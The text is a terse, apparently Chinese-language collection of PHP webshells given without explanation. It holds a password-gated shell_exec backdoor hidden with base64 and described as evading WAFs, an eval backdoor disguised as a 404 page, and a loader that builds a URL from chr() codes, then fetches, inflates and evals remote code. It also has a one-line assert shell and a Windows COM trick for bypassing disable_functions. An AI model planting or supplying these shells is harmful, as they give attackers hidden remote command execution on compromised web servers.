目录
一句话过狗小马
<?php
//pwd=iChina
function payload($cmd,$pwd,$func)
{
//执行命令
if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') {
$array = array($func,"iChina","Secquan.org");
$result = $array[0]($cmd);
echo $result;
} else {
echo 'Password is wrong!';
}
}
if (isset($_GET['cmd'])&&isset($_GET['pwd'])) {
$cmd = $_GET['cmd'];
$pwd = md5($_GET['pwd']);
$func = base64_decode('c2hlbGxfZXhlYw==');
payload($cmd,$pwd,$func);
} else {
echo 'Please input password!';
}
?>
404伪装马
<?php
header('HTTP/1.1 404 Not Found');
@eval($_GET["error"]); //一句话
?>
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>404 Not Found</title>
</head>
<body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
</body>
</html>
4.00 KB大马
<?php
$password='cmd';
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
echo $url;
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>
PHP7 马:
<?php
@'assert'(@$_POST[1]);
?>
Windows disable_func绕过:
<?php
$command=$_POST[a];
$wsh = new COM('WScript.shell'); // 生成一个COM对象
$exec = $wsh->exec('cmd.exe /c '.$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput
?>